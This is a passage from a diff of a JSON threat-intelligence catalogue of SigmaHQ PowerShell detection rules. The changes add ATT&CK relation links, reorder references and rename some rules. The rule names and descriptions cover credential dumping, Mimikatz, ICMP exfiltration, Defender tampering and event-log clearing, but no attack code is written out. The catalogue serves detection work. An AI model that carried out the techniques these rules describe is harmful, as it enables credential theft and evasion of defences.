"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21f9162c-5f5d-4b01-89a8-b705bd7d10ab", "value": "Import PowerShell Modules From Suspicious Directories" }, @@ -19423,6 +24326,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", "value": "Dump Credentials from Windows Credential Manager With PowerShell" }, @@ -19448,6 +24360,15 @@ "attack.t1573" ] }, + "related": [ + { + "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", "value": "Suspicious SSL Connection" }, @@ -19473,7 +24394,7 @@ "value": "Potential In-Memory Execution Using Reflection.Assembly" }, { - "description": "Detecting use WinAPI Functions in PowerShell", + "description": "Detects use of WinAPI Functions in PowerShell scripts", "meta": { "author": "Nikita Nazarov, oscd.community, Tim Shelton", "creation_date": "2020/10/06", @@ -19494,8 +24415,24 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03d83090-8cba-44a0-b02f-0b756a050306", - "value": "Accessing WinAPI in PowerShell" + "value": "Potential WinAPI Calls Via PowerShell Scripts" }, { "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", @@ -19510,8 +24447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://www.powershellgallery.com/packages/DSInternals", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ @@ -19519,6 +24456,15 @@ "attack.t1003.006" ] }, + "related": [ + { + "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "value": "Suspicious Get-ADReplAccount" }, @@ -19561,8 +24507,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], @@ -19571,6 +24517,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", "value": "Change PowerShell Policies to an Insecure Level - PowerShell" }, @@ -19611,8 +24566,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ @@ -19620,6 +24575,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", "value": "Suspicious Unblock-File" }, @@ -19668,6 +24632,15 @@ "attack.t1555" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "603c6630-5225-49c1-8047-26c964553e0e", "value": "Enumerate Credentials from Windows Credential Manager With PowerShell" }, @@ -19694,6 +24667,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" }, @@ -19710,8 +24692,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" ], "tags": [ @@ -19743,6 +24725,15 @@ "attack.t1546.013" ] }, + "related": [ + { + "dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "value": "Powershell Trigger Profiles by Add_Content" }, @@ -19791,6 +24782,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "value": "Powershell Execute Batch Script" }, @@ -19817,6 +24817,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell" }, @@ -19842,6 +24851,15 @@ "attack.t1484.001" ] }, + "related": [ + { + "dest-uuid": "5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "value": "Modify Group Policy Settings - ScriptBlockLogging" }, @@ -19866,6 +24884,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "value": "Powershell Store File In Alternate Data Stream" }, @@ -19913,6 +24940,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "value": "Suspicious PowerShell Download - Powershell Script" }, @@ -19929,8 +24965,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" ], "tags": [ @@ -19938,6 +24974,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b8af5f36-1361-4ebe-9e76-e36128d947bf", "value": "Use Remove-Item to Delete File" }, @@ -19964,6 +25009,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", "value": "PowerShell Credential Prompt" }, @@ -19989,6 +25043,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", "value": "Execute Invoke-command on Remote Host" }, @@ -20014,6 +25077,15 @@ "attack.t1565" ] }, + "related": [ + { + "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4368354e-1797-463c-bc39-a309effbe8d7", "value": "Powershell Add Name Resolution Policy Table Rule" }, @@ -20038,6 +25110,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", "value": "Malicious PowerShell Keywords" }, @@ -20064,6 +25145,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell" }, @@ -20088,6 +25178,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", "value": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock" }, @@ -20137,6 +25236,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf72941a-cba0-41ea-b18c-9aca3925690d", "value": "PowerShell ADRecon Execution" }, @@ -20162,6 +25270,15 @@ "attack.t1615" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb2fd349-ec67-4caa-9143-d79c7fb34441", "value": "Suspicious GPO Discovery With Get-GPO" }, @@ -20187,6 +25304,15 @@ "attack.t1098" ] }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "value": "Powershell LocalAccount Manipulation" }, @@ -20211,6 +25337,15 @@ "attack.t1048.003" ] }, + "related": [ + { + "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4c4af3cd-2115-479c-8193-6b8bfce9001c", "value": "PowerShell ICMP Exfiltration" }, @@ -20242,6 +25377,36 @@ "attack.s0363" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3ceb2083-a27f-449a-be33-14ec1b7cc973", "value": "Silence.EDA Detection" }, @@ -20258,8 +25423,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ @@ -20267,6 +25432,15 @@ "attack.t1571" ] }, + "related": [ + { + "dest-uuid": "b18eae87-b469-4e14-b454-b171b416bc18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", "value": "Testing Usage of Uncommonly Used Port" }, @@ -20306,9 +25480,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ @@ -20340,6 +25514,15 @@ "attack.t1491.001" ] }, + "related": [ + { + "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "value": "Replace Desktop Wallpaper by Powershell" }, @@ -20387,6 +25570,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd185561-4760-45d6-a63e-a51325112cae", "value": "Live Memory Dump Using Powershell" }, @@ -20441,9 +25633,53 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell" }, + { + "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "meta": { + "author": "frack113", + "creation_date": "2023/01/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_set_alias.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/1337Rin/Swag-PSO", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_set_alias.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1027", + "attack.t1059.001" + ] + }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "96cd126d-f970-49c4-848a-da3a09f55c55", + "value": "Potential PowerShell Obfuscation Using Alias Cmdlets" + }, { "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", "meta": { @@ -20506,8 +25742,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://www.powertheshell.com/ntfsstreams/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "http://www.powertheshell.com/ntfsstreams/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" ], "tags": [ @@ -20517,6 +25753,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", "value": "NTFS Alternate Data Stream" }, @@ -20558,8 +25810,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ @@ -20567,6 +25819,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "value": "Powershell Create Scheduled Task" }, @@ -20583,8 +25844,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -20592,6 +25853,15 @@ "attack.t1070.006" ] }, + "related": [ + { + "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", "value": "Powershell Timestomp" }, @@ -20616,6 +25886,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "value": "PowerShell PSAttack" }, @@ -20641,6 +25920,15 @@ "attack.t1564.006" ] }, + "related": [ + { + "dest-uuid": "b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42d36aa1-3240-4db0-8257-e0118dcdd9cd", "value": "Suspicious Hyper-V Cmdlets" }, @@ -20691,6 +25979,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "afd12fed-b0ec-45c9-a13d-aa86625dac81", "value": "Create Volume Shadow Copy with Powershell" }, @@ -20716,6 +26013,15 @@ "attack.t1021.006" ] }, + "related": [ + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "value": "Enable Windows Remote Management" }, @@ -20755,9 +26061,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://twitter.com/oroneequalsone/status/1568432028361830402", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://twitter.com/oroneequalsone/status/1568432028361830402", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" ], "tags": [ @@ -20765,6 +26071,15 @@ "attack.t1070.001" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", "value": "Suspicious Eventlog Clear" }, @@ -20789,6 +26104,15 @@ "attack.t1069.001" ] }, + "related": [ + { + "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", "value": "Suspicious Get Information for SMB Share" }, @@ -20834,6 +26158,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "value": "Malicious ShellIntel PowerShell Commandlets" }, @@ -20851,8 +26184,8 @@ "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ @@ -20860,6 +26193,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "value": "WMIC Unquoted Services Path Lookup - PowerShell" }, @@ -20911,6 +26253,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", "value": "Suspicious Invoke-Item From Mount-DiskImage" }, @@ -20935,6 +26286,15 @@ "attack.t1114.001" ] }, + "related": [ + { + "dest-uuid": "1e9eb839-294b-48cc-b0d3-c45555a2a004", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", "value": "Powershell Local Email Collection" }, @@ -20976,8 +26336,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ @@ -21001,8 +26361,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" ], "tags": [ @@ -21010,6 +26370,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f588e69b-0750-46bb-8f87-0e9320d57536", "value": "Execution via CL_Invocation.ps1 (2 Lines)" }, @@ -21034,6 +26403,15 @@ "attack.t1560" ] }, + "related": [ + { + "dest-uuid": "53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", "value": "Data Compressed - PowerShell" }, @@ -21075,8 +26453,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" ], "tags": [ @@ -21110,6 +26488,15 @@ "attack.t1003" ] }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", "value": "Potential Invoke-Mimikatz PowerShell Script" }, @@ -21135,6 +26522,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "value": "Troubleshooting Pack Cmdlet Execution" }, @@ -21160,6 +26556,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "value": "Execution via CL_Mutexverifiers.ps1" }, @@ -21235,6 +26640,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "value": "Invoke-Obfuscation Via Use Clip - Powershell" }, @@ -21284,6 +26698,15 @@ "attack.t1553.005" ] }, + "related": [ + { + "dest-uuid": 